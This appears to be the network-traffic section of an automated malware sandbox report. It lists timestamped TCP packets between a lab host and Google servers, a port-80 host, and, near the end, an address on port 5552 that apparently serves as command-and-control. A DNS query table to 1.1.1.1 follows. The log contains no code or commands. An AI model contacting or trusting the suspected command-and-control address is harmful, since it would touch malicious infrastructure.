                                                                                                              Dec 30, 2024 11:37:48.134855032 CET50563443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:48.134855032 CET50563443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:48.134881973 CET44350563142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.545605898 CET44350559142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.545712948 CET50559443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:48.546397924 CET44350559142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.546473026 CET50559443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:48.550388098 CET50559443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:48.550403118 CET44350559142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.550695896 CET44350559142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.550940990 CET50559443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:48.551650047 CET50559443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:48.561283112 CET44350560142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.561446905 CET50560443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:48.562076092 CET44350560142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.562135935 CET50560443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:48.563741922 CET50560443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:48.563751936 CET44350560142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.564049959 CET44350560142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.564165115 CET50560443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:48.564476967 CET50560443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:48.595325947 CET44350559142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.597737074 CET44350562142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.600136042 CET50562443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:48.607326984 CET44350560142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.748492956 CET44350563142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.752485037 CET50563443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:48.834738970 CET4973980192.168.2.469.42.215.252
                                                                                                              Dec 30, 2024 11:37:48.924617052 CET44350559142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.925470114 CET44350559142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.925581932 CET50559443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:48.928289890 CET44350560142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.928380013 CET50560443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:48.928447008 CET44350560142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.929363966 CET44350560142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.929419041 CET50560443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:48.978615999 CET50560443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:48.978652000 CET44350560142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.979667902 CET50562443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:48.979698896 CET44350562142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.979959011 CET50562443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:48.979964972 CET44350562142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.980406046 CET50564443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:48.980453014 CET44350564142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.980541945 CET50564443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:48.980775118 CET50563443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:48.980868101 CET44350563142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:48.980921030 CET50563443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:48.982062101 CET50564443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:48.982086897 CET44350564142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.013492107 CET50565443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.013556004 CET44350565142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.013665915 CET50565443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.015999079 CET50559443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:49.016027927 CET44350559142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.016992092 CET50566443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:49.017039061 CET44350566142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.017344952 CET50566443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:49.017780066 CET50566443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:49.017810106 CET44350566142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.039261103 CET50565443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.039278030 CET44350565142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.311378002 CET44350562142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.311439991 CET44350562142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.311453104 CET50562443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.311486959 CET44350562142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.311501026 CET50562443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.311553955 CET50562443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.311561108 CET44350562142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.311572075 CET44350562142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.311615944 CET50562443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.313867092 CET50562443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.313888073 CET44350562142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.315767050 CET50569443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.315817118 CET44350569142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.315937996 CET50569443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.317343950 CET50569443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.317356110 CET44350569142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.591674089 CET44350564142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.591736078 CET50564443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:49.592120886 CET50564443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:49.592129946 CET44350564142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.592299938 CET50564443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:49.592305899 CET44350564142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.639153004 CET44350565142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.639228106 CET50565443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.642443895 CET50565443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.642456055 CET44350565142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.642800093 CET44350565142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.643007994 CET50565443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.643599033 CET50565443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.650719881 CET44350566142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.650821924 CET50566443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:49.651360989 CET50566443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:49.651371002 CET44350566142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.651515961 CET50566443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:49.651520967 CET44350566142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.691329002 CET44350565142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.917702913 CET44350569142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.917779922 CET50569443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.921411037 CET50569443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.921439886 CET44350569142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.921684980 CET44350569142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.921794891 CET50569443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.922086000 CET50569443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:49.963337898 CET44350569142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.964188099 CET44350564142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.964258909 CET50564443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:49.964277029 CET44350564142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.964309931 CET50564443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:49.964536905 CET50564443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:49.964565039 CET44350564142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.964700937 CET50564443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:49.965267897 CET50570443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:49.965322018 CET44350570142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:49.966165066 CET50570443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:49.966753960 CET50570443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:49.966769934 CET44350570142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.033391953 CET44350566142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.033447981 CET50566443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.033476114 CET44350566142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.033535004 CET50566443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.034029961 CET44350566142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.034079075 CET44350566142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.034085989 CET50566443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.034116030 CET50566443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.040787935 CET50566443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.040813923 CET44350566142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.041357040 CET50571443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.041394949 CET44350571142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.041507006 CET50571443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.041918039 CET50571443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.041929960 CET44350571142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.106735945 CET44350565142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.106791019 CET44350565142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.106800079 CET50565443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.106827021 CET44350565142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.106841087 CET50565443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.106859922 CET50565443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.106864929 CET44350565142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.106899977 CET50565443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.106905937 CET44350565142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.106919050 CET44350565142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.106955051 CET50565443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.107614040 CET50565443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.107628107 CET44350565142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.108344078 CET50572443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.108392954 CET44350572142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.110589027 CET50572443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.110961914 CET50572443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.110975981 CET44350572142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.343178988 CET44350569142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.343240976 CET50569443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.343249083 CET44350569142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.343265057 CET44350569142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.343310118 CET50569443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.343327999 CET44350569142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.343355894 CET50569443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.343360901 CET44350569142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.343420982 CET44350569142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.343441010 CET50569443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.343458891 CET50569443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.344217062 CET50569443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.344235897 CET44350569142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.345077991 CET50573443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.345132113 CET44350573142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.345491886 CET50573443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.345751047 CET50573443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.345762968 CET44350573142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.576672077 CET44350570142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.576772928 CET50570443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.577733040 CET44350570142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.577800989 CET50570443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.582669020 CET50570443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.582695007 CET44350570142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.582957983 CET44350570142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.583008051 CET50570443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.583528042 CET50570443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.631331921 CET44350570142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.639014959 CET44350571142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.639107943 CET50571443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.639786005 CET44350571142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.639839888 CET50571443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.642849922 CET50571443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.642858028 CET44350571142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.643115044 CET44350571142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.643227100 CET50571443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.643553972 CET50571443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.691322088 CET44350571142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.710059881 CET44350572142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.710294962 CET50572443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.718081951 CET50572443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.718092918 CET44350572142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.718236923 CET50572443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.718240976 CET44350572142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.941015005 CET44350570142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.941099882 CET50570443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.941132069 CET44350570142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.941174984 CET50570443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.941701889 CET44350570142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.941749096 CET44350570142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.941751957 CET50570443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.941785097 CET50570443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.942004919 CET50570443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.942023993 CET44350570142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.943197966 CET50574443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.943257093 CET44350574142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.943337917 CET50574443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.943795919 CET50574443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:50.943810940 CET44350574142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.945602894 CET44350573142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.945674896 CET50573443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.946023941 CET50573443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.946032047 CET44350573142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:50.946187019 CET50573443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:50.946196079 CET44350573142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.009192944 CET44350571142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.009288073 CET50571443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:51.009324074 CET44350571142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.009495020 CET50571443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:51.009605885 CET50571443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:51.009685040 CET44350571142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.009735107 CET50571443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:51.010349035 CET50575443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:51.010401964 CET44350575142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.010649920 CET50575443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:51.010870934 CET50575443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:51.010884047 CET44350575142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.111052036 CET44350572142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.111114979 CET44350572142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.111166954 CET50572443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:51.111166954 CET50572443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:51.111177921 CET44350572142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.111229897 CET44350572142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.111371994 CET50572443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:51.118825912 CET50572443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:51.118849993 CET44350572142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.120239019 CET50576443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:51.120287895 CET44350576142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.120342970 CET50576443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:51.120632887 CET50576443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:51.120650053 CET44350576142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.443470955 CET44350573142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.443530083 CET44350573142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.443576097 CET50573443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:51.443604946 CET44350573142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.443624973 CET50573443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:51.443638086 CET50573443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:51.443643093 CET44350573142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.443660975 CET44350573142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.443701982 CET50573443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:51.451853037 CET50573443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:51.451890945 CET44350573142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.454993010 CET50578443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:51.455049992 CET44350578142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.455167055 CET50578443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:51.455369949 CET50578443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:51.455385923 CET44350578142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.549597979 CET44350574142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.549700022 CET50574443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:51.550389051 CET44350574142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.550601006 CET50574443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:51.612718105 CET44350575142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.612790108 CET50575443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:51.613497972 CET44350575142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.613634109 CET50575443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:37:51.730012894 CET44350576142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.730190992 CET50576443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:52.065705061 CET44350578142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:37:52.065773964 CET50578443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:37:53.642905951 CET4973980192.168.2.469.42.215.252
                                                                                                              Dec 30, 2024 11:38:03.252290010 CET4973980192.168.2.469.42.215.252
                                                                                                              Dec 30, 2024 11:38:03.509388924 CET555249758172.111.138.100192.168.2.4
                                                                                                              Dec 30, 2024 11:38:03.564975023 CET497585552192.168.2.4172.111.138.100
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 30, 2024 11:35:54.313699961 CET5119353192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:35:54.320921898 CET53511931.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:35:55.214487076 CET5764853192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:35:55.221702099 CET53576481.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:35:55.246777058 CET5417753192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:35:55.253983974 CET53541771.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:35:55.345419884 CET6143053192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:35:55.352435112 CET53614301.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:36:01.527348995 CET5353353192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:36:01.536122084 CET53535331.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:36:08.450062037 CET6551153192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:36:08.458672047 CET53655111.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:36:15.582698107 CET5916353192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:36:15.590351105 CET53591631.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:36:22.394555092 CET6152653192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:36:22.537523985 CET53615261.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:36:29.504031897 CET5607153192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:36:29.511379957 CET53560711.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:36:36.300795078 CET5542453192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:36:36.307945013 CET53554241.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:36:40.848048925 CET6382753192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:36:40.855909109 CET53638271.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.583889961 CET5726653192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:36:46.590826988 CET53572661.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:36:53.417892933 CET6178853192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:36:53.425443888 CET53617881.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:37:00.224836111 CET5998253192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:37:00.231900930 CET53599821.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:37:04.755146027 CET6444953192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:37:04.762151003 CET53644491.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:37:10.425905943 CET6100753192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:37:10.550421953 CET53610071.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:37:17.332079887 CET5692053192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:37:17.339066029 CET53569201.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:37:21.886954069 CET5807753192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:37:21.894351959 CET53580771.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:37:27.598063946 CET5887553192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:37:27.604885101 CET53588751.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:37:34.394710064 CET5102953192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:37:34.402811050 CET53510291.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:37:41.192452908 CET5581653192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:37:41.199850082 CET53558161.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:37:45.710791111 CET6302353192.168.2.41.1.1.1
                                                                                                              Dec 30, 2024 11:37:45.718930006 CET53630231.1.1.1192.168.2.4
                                                                                                              Dec 30, 2024 11:37:51.379136086 CET5371553192.168.2.41.1.1.1
